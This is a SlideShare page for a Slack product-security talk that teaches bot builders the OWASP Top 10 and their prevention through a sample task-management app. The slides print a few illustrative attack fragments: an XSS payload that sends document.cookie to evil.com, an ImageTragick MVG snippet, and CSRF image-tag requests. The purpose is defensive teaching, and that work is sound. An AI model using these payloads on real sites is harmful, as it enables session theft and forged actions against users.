SlideShare a Scribd company logo

Security Best Practices for Bot Builders

Download as PPTX, PDF
M
Max Feldman

This document provides security best practices for bot builders. It discusses common web application vulnerabilities like injection, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing function level access control, cross-site request forgery, using components with known vulnerabilities, and underprotected APIs. The document uses an example of building a task management app to demonstrate how to find and prevent these vulnerabilities, emphasizing that user input should not be trusted and the principle of least privilege. Key takeaways are to design securely from the beginning, limit permissions to the minimum required, and think about how an attacker could abuse systems. Helpful security resources are also provided.

Technology
1 of 45
Security Best Practices For Bot Builders
Questions? Comments? Tweet questions, photos or GIFs at #SlackDevTour or @SlackAPI 😁
Hi! I’m Max Feldman Product Security @ Slack mfeldman@slack-corp.com @MrsBufferworths https://img.wonderhowto.com/img/50/81/63545703386404/0/advice-from-real-hacker-protect-yourself-from-being-hacked.1280x600.jpg
Agenda ● Common web application vulnerabilities (OWASP Top 10) ● Designing an example bot and ○ Finding these vulnerabilities ○ Preventing these vulnerabilities ● Q&A
Why should you care? ● Put food on the table ● A hack can be devastating to users, and in turn, to business
Why should you care? ● Bots operating in an enterprise handle highly sensitive information ● Our customers trust us (Slack and you) to keep their data secure ● Slack conducts security reviews of App Directory apps
Bots and Integrations ● Bot - digital user, powered by software ● Integration - linking of multiple services (e.g. a 3rd-party integrates with Slack via a slash command) ○ A bot can be part of an integration
Web Application Security ● Bots and integrations generally rely on websites/servers ● We need to ensure the security of all components to ensure the security of our customers
OWASP Top 10 https://www.owasp.org/index.php/Top_10_2013-Top_10 ● OWASP: Open Web Application Security Project ○ Dedicated to web security ○ Makes handy tools (more later) ● Top 10: the top 10 most critical web application vulnerabilities
Dynamic Web Pages ● A lot of security issues result from trusting user input (as it’s run on the backend, displayed on the page, etc.) ● Modern web apps are complex - be aware of user input sources User Input
1. Injection ● General injection flaws (attacker code running on server) ○ SQLi, OS, others ○ Outcome = remote code execution, arbitrary file read, others ● Remote code execution ○ Attackers can run code on your server
1. Injection ● Remote code execution ○ E.g. Image Tragick - exploit.mvg - processing this image would result in arbitrary call being executed push graphic-context viewbox 0 0 640 480 fill ‘url(https://127.0.0.1/oops.jpg”|<arbitrary call>)’ pop graphic-context ● SQL injection ○ Untrusted user input is parsed and interpreted as SQL code ○ Database dumps, can also lead to RCE
2. Broken Authentication and Session Management ● Weak session tokens, values which get repeated ● No auth checks ● All sorts of diverse problems ○ Sessions not verified ○ Secrets not securely generated/long enough ● A door with no lock https://www.owasp.org/index.php/Authentication_Cheat_Sheet https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
3. Cross-Site Scripting ● Attacker injects Javascript into a web page, which then runs in the context of that page ● User input is everywhere in dynamic web pages - if left unsanitized, the browser will interpret it as code XSS Potential
3. Cross-Site Scripting ● Cookies - keys to the web application ○ We (we are hackers now) want to steal them ○ Example cookie theft payload: document.write('<img src="https://evil.com/collect.gif?cookie=' + document.cookie + '" />') https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
4. Insecure Direct Object Reference
5. Security Misconfiguration ● Out-of-date software ● Unnecessary services running ● Default accounts/passwords enabled ● Debug mode, stack traces on, etc
6. Sensitive Data Exposure ● Not adequately protecting data ● Plaintext storage of passwords (or unsalted hashes), logging of sensitive information ● Not using HTTPS/SSL/encrypted communication
7. Missing Function Level Access Control ● Security which relies on the secrecy of the function itself ○ API functionality which doesn’t perform access control checks (even though the functionality is not exposed in the UI) - can be performed with just the request ○ Navigating directly to hidden pages (http://example.com/app/admin)
8. Cross-Site Request Forgery ● Cross-site request forgery ○ Post-authentication, user is forced to perform a state- changing request ○ The server only sees an authenticated request telling it to change state, acts accordingly ● Bank example: ○ https://bank.com/transfer?to=mom&amount=20
8. Cross-Site Request Forgery ● Cross-site request forgery ○ Post-authentication, user is forced to perform a state- changing request ○ The server only sees an authenticated request telling it to change state, acts accordingly ● Bank example: ○ https://bank.com/transfer?to=mom&amount=20 ● GET <img src=bank.com/transfer?to=evilAccount&amount=10000...> ● POST requests also possible
9. Using Components with Known Vulnerabilities ● Don’t use things that have known vulnerabilities! ● They are vulnerable
10. Underprotected APIs* ● API endpoints which have vulnerabilities or lack protection/prevention measures, e.g. ○ An API endpoint which doesn’t perform authentication ○ An HTTP endpoint ● Don’t assume that API endpoints will only receive requests from well-behaving users ○ Even if the APIs are for a mobile app/backend, attackers can intercept traffic * This is from the release candidate for the new OWASP Top 10 (overlaps a bit with #7)
How to find and prevent these vulnerabilities Scenario: Building a Task Management App
What should our task manager do? ● Integrate an existing task management service (taskbot-site.com) ● Users use a slash command to manage (create/edit/delete) and view tasks ● Users can also manage tasks from taskbot- site.com
How do we find and prevent vulnerabilities? Don’t trust anything! Let’s walk through the OWASP Top 10 XSS, CSRF, SSL issues are what we see most often (in App Directory reviews)
1. Injection ● Let’s say taskbot-site.com has an API, which receives requests and then creates a Task ● E.g. POST taskbot-site.com/create task=”Don’t get hacked” ● Tasks are stored into a SQL DB ● Don’t trust user input! ● Use bind variables/paramaterized statements for SQL ● Don’t put user input in places where it may be executed
2. Broken Authentication and Session Management ● How does the API know who is actually creating the request? POST taskbot-site.com/create task=”Don’t get hacked” user=”Happy user” ● An attacker can modify the user parameter if we blindly trust it ● Check that sensitive actions require authorization ● Authenticate users, use best practices for session management ○ Most web app frameworks offer these capabilities ○ Burp, ZAP can find some of these issues ● Keep secrets secret! (and unguessable)
3. Cross-Site Scripting ● Let’s say taskbot-site.com has a web frontend for searching through your tasks ○ taskbot-site.com/search?param=”laundry” ● What if param=<malicious javascript>?
3. Cross-Site Scripting ● We need to look for places with user input and make sure we encode them on the page (your framework can probably do this) ○ &lt; &gt; etc. (HTML entities) ● OWASP has a cheat sheet of inputs which may trigger XSS - https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sh eet ● Don’t trust user input! ● ZAP, Burp
4. Insecure Direct Object Reference ● We want users to be able to view their tasks at taskbot- site.com/TaskID ● A new user signs up and creates a task, which points to taskbot- site.com/10012 ● What happens if they go to taskbot-site.com/10011? ● Make sure to check authorization for all privileged resources! ○ Most web application frameworks offer this
5. Security Misconfiguration ● Follow the best practices for the security of your framework ○ Disable default credentials ○ Disable verbose debugs, stack traces ● Run/provide access to only what is necessary ● Principle of least privilege - request only the permissions that you need ○ If using OAuth, request scope with minimum required capabilities (https://api.slack.com/docs/oauth-scopes)
6. Sensitive Data Exposure ● Use SSL/TLS! ○ But don’t use weak ciphers/protocols ○ Qualys SSL Test, sslyze to test your server ● Do people need to login to taskbot-site.com/TaskID ○ How do we store sensitive information (passwords, etc.)? ■ Plaintext = bad ■ bcrypt, PBKDF2 = good ● Be aware of how data is transmitted and stored - avoid plaintext
7. Missing Function Level Access Control ● taskbot-site.com/admin - how do we control access to this page? ○ Check that users are authenticated and authorized to reach this content ● Require auth for these pages ○ Be aware of what these pages are! ○ Admin pages, default pages from the framework ○ Burp and ZAP can help automate this
8. Cross-Site Request Forgery ● Task creation directly from taskbot-site.com GET taskbot-site.com/create?task=”Don’t get hacked” ● An attacker can create a malicious page containing this request, <html><img src=taskbot-site.com/create?task=”DO get hacked”></html> ● Check for state-changing actions, and add CSRF-prevention (a CSRF token) ● POST taskbot-site.com/create?task=”Don’t get hacked”
8. Cross-Site Request Forgery ● CSRF prevention done via CSRF tokens ○ Tokens not sent automatically (so an attacker can’t guess them) ○ Can be POST data or part of the header ● POST taskbot-site.com/create task=”Don’t get hacked”&csrf_token=<random> ● Most frameworks provide CSRF prevention mechanisms ● ZAP, Burp
9. Using Components with Known Vulnerabilities ● Nikto is a good general scanner ● Many language or framework-specific scanners as well ○ (wpscan for wordpress) ● Update and patch your systems and your software! ● For example, don’t run taskbot-site.com on Apache 1.0 on an OS from 1994
10. Underprotected APIs ● Suppose we want taskbot-site.com/create to be available to Slack, but we assume users won’t use it ○ If we have no protection, attackers can still find and use this API endpoint ○ Verify that requests originate from Slack (we send along a token for verification, https://api.slack.com/tutorials/your- first-slash-command) ● Check hidden/unpublished APIs as well (attackers can still access them)
Security Development Lifecycle ● We’ve talked about specific vulnerabilities, but also be aware of the development process
Key Takeaways ● Don’t trust user input! ○ Where is dynamic data influencing control of your application ○ Think of how an attacker might abuse your system ● Think about security from the beginning ○ Use an SDL, design securely, have a process
Key Takeaways ● Principle of least privilege - limit the power and permissions allowed to services to bare minimum ○ Restrict OAuth scope to what’s necessary ○ Over-permissioned services are dangerous
Q&A
Helpful Resources OWASP Nikto ZAP, Burp WPScan Qualys SSL, SSLyze sqlmap Nmap General Slack Security Slack App Directory Security Review
Stay in touch ● Install the Platform News App for fresh news, delivered straight to Slack ● Chat with us on Twitter @SlackAPI

Recommended

Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFjohnwilander
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 

Recommended

Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFjohnwilander
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Advanced xss
Advanced xssAdvanced xss
Advanced xssGajendra Saini
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxAaron Weaver
 
Fav
FavFav
Favhelloppt
 
Understanding CSRF
Understanding CSRFUnderstanding CSRF
Understanding CSRFPotato
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
How not to make a hacker friendly application
How not to make a hacker friendly applicationHow not to make a hacker friendly application
How not to make a hacker friendly applicationAbhinav Mishra
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.BugRaptors
 
Attacking Web Proxies
Attacking Web ProxiesAttacking Web Proxies
Attacking Web ProxiesInMobi Technology
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)Emily Nakashima
 
Hunting Security Bugs in Modern Web Applications
Hunting Security Bugs in Modern Web ApplicationsHunting Security Bugs in Modern Web Applications
Hunting Security Bugs in Modern Web ApplicationsToe Khaing
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethembaOWASP (Open Web Application Security Project)
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 

More Related Content

What's hot

Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxAaron Weaver
 
Understanding CSRF
Understanding CSRFUnderstanding CSRF
Understanding CSRFPotato
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
How not to make a hacker friendly application
How not to make a hacker friendly applicationHow not to make a hacker friendly application
How not to make a hacker friendly applicationAbhinav Mishra
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.BugRaptors
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)Emily Nakashima
 

What's hot (19)

Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
Fav
FavFav
Fav
 
Understanding CSRF
Understanding CSRFUnderstanding CSRF
Understanding CSRF
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
 
How not to make a hacker friendly application
How not to make a hacker friendly applicationHow not to make a hacker friendly application
How not to make a hacker friendly application
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
 
An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.
 
Attacking Web Proxies
Attacking Web ProxiesAttacking Web Proxies
Attacking Web Proxies
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
What Your JavaScript Does When You're Not Around (Influx Days 2017 Edition)
 

Similar to Security Best Practices for Bot Builders

Hunting Security Bugs in Modern Web Applications
Hunting Security Bugs in Modern Web ApplicationsHunting Security Bugs in Modern Web Applications
Hunting Security Bugs in Modern Web ApplicationsToe Khaing
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practicesNeoito
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Simple web security
Simple web securitySimple web security
Simple web security裕夫 傅
 
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...LogeekNightUkraine
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...
Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...
Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...Jimmy DeadcOde
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!Cláudio André
 
At Your Service - Abusing the Service Workers Web API
At Your Service - Abusing the Service Workers Web APIAt Your Service - Abusing the Service Workers Web API
At Your Service - Abusing the Service Workers Web APIDaniel Abeles
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber SecurityChris Watts
 
Protecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseProtecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseBen Stock
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 

Similar to Security Best Practices for Bot Builders (20)

Hunting Security Bugs in Modern Web Applications
Hunting Security Bugs in Modern Web ApplicationsHunting Security Bugs in Modern Web Applications
Hunting Security Bugs in Modern Web Applications
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practices
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservices
 
Simple web security
Simple web securitySimple web security
Simple web security
 
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...
Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...
Website Monitoring with Distributed Messages/Tasks Processing (AMQP & RabbitM...
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!
 
At Your Service - Abusing the Service Workers Web API
At Your Service - Abusing the Service Workers Web APIAt Your Service - Abusing the Service Workers Web API
At Your Service - Abusing the Service Workers Web API
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber Security
 
Protecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseProtecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager Abuse
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 

Recently uploaded

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
